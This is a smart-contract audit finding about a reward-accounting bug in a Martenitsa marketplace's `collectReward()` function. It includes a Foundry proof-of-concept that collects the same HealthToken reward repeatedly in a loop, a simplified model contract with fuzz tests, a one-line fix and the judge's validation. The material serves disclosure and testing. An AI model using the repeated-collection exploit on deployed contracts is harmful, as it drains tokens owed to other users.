Severity: high
Valid

`_collectedRewards` calculation is incorrect in function `collectReward()`

Summary

The `_collectedRewards` calculation in `collectReward()` is incorrect: `_collectedRewards` should accumulate all rewards that have been collected, but the function overwrites it with the amount of the latest collection.

Vulnerability Details

    function collectReward() external {
        require(!martenitsaToken.isProducer(msg.sender), "You are producer and not eligible for a reward!");
        uint256 count = martenitsaToken.getCountMartenitsaTokensOwner(msg.sender);
        uint256 amountRewards = (count / requiredMartenitsaTokens) - _collectedRewards[msg.sender];
        if (amountRewards > 0) {
    @>      _collectedRewards[msg.sender] = amountRewards;
            healthToken.distributeHealthToken(msg.sender, amountRewards);
        }
    }

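The line marked `@>` assigns the latest `amountRewards` to `_collectedRewards[msg.sender]` instead of adding to it. After a second collection the stored value is lower than the total already paid out, so the subtraction keeps returning a positive amount and the caller can collect the same reward again and again.

POC: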

    function testCalculationIncorrectCollectReward() public eligibleForReward {
        vm.startPrank(bob);
        marketplace.collectReward();
        vm.stopPrank();
        assert(healthToken.balanceOf(bob) == 10 ** 18);
        // give bob another 3 martenitsaToken
        vm.startPrank(chasy);
        martenitsaToken.createMartenitsa("bracelet");
        martenitsaToken.createMartenitsa("bracelet");
        martenitsaToken.createMartenitsa("bracelet");
        martenitsaToken.approve(address(marketplace), 3);
        martenitsaToken.approve(address(marketplace), 4);
        martenitsaToken.approve(address(marketplace), 5);
        marketplace.makePresent(bob, 3);
        marketplace.makePresent(bob, 4);
        marketplace.makePresent(bob, 5);
        vm.stopPrank();
        vm.prank(bob);
        marketplace.collectReward();
        assert(healthToken.balanceOf(bob) == 2 * 10 ** 18);
        // bob can collect reward again and again
        for (uint256 i = 0; i < 10; i++) {
            vm.prank(bob);
            marketplace.collectReward();
        }
        assert(healthToken.balanceOf(bob) == 12 * 10 ** 18);
    }

Add this test function to `MartenitsaMarketplace.t.sol`, then run `forge test --mt testCalculationIncorrectCollectReward`.
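
The invariant behind this finding, as an added example that is not the project's code: a constructed stand-in contract (`RewardModel`, with hypothetical `give`, `count`, `paid` and an assumed `REQUIRED` of 3) models only the reward accounting. A Foundry fuzz test checks that the accumulating update never pays more than the entitlement, while the overwrite reproduces the PoC's 12 payouts.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.21;
import {Test} from "forge-std/Test.sol";
// Constructed stand-in for the reward accounting only; not the project's contract.
contract RewardModel {
    uint256 public constant REQUIRED = 3; // assumed requiredMartenitsaTokens
    mapping(address => uint256) public count; // stands in for getCountMartenitsaTokensOwner
    mapping(address => uint256) public collected; // _collectedRewards
    mapping(address => uint256) public paid; // reward units handed out so far
    function give(address to, uint256 n) external { count[to] += n; }
    // accumulate == false is the reported overwrite, true is the accumulating update
    function collectReward(bool accumulate) external {
        uint256 amount = count[msg.sender] / REQUIRED - collected[msg.sender];
        if (amount > 0) {
            collected[msg.sender] = accumulate ? collected[msg.sender] + amount : amount;
            paid[msg.sender] += amount;
        }
    }
}

contract RewardModelTest is Test {
    RewardModel model;
    address bob = address(0xB0B);
    function setUp() public { model = new RewardModel(); }
    function collectAs(bool accumulate, uint256 calls) internal {
        for (uint256 i = 0; i < calls; i++) {
            vm.prank(bob);
            model.collectReward(accumulate);
        }
    }

    // With accumulation, total paid equals the entitlement however often bob calls.
    function testFuzz_accumulateNeverOverpays(uint8 first, uint8 second, uint8 calls) public {
        model.give(bob, first);
        collectAs(true, 1);
        model.give(bob, second);
        collectAs(true, uint256(calls) + 1);
        assertEq(model.paid(bob), (uint256(first) + second) / model.REQUIRED());
    }

    // Same sequence as the PoC with the overwrite: 12 units paid, 2 owed.
    function test_overwriteOverpays() public {
        model.give(bob, 3);
        collectAs(false, 1);
        model.give(bob, 3);
        collectAs(false, 11);
        assertEq(model.paid(bob), 12);
    }
}
```
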

Impact

High

Tools Used

Foundry

Recommendations

function collectReward() external {
require(!martenitsaToken.isProducer(msg.sender), "You are producer and not eligible for a reward!");
uint256 count = martenitsaToken.getCountMartenitsaTokensOwner(msg.sender);
uint256 amountRewards = (count / requiredMartenitsaTokens) - _collectedRewards[msg.sender];
if (amountRewards > 0) {
- _collectedRewards[msg.sender] = amountRewards;
+ _collectedRewards[msg.sender] += amountRewards;
healthToken.distributeHealthToken(msg.sender, amountRewards);
}
}
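
Review bot: the unsigned subtraction on the `amountRewards` line has no guard, and with the `+=` line `_collectedRewards[msg.sender]` becomes a running total that can exceed `count / requiredMartenitsaTokens` if the caller's `count` later falls (for example after giving tokens away with `makePresent`). In that case the call reverts or wraps, depending on the compiler version. Suggest comparing the two values first and returning early when nothing is owed, and keeping the PoC as a regression test with its final assertion changed to expect no further payout.
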
Updates

Lead Judging Commences

bube Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

_collectedRewards is not updated correctly
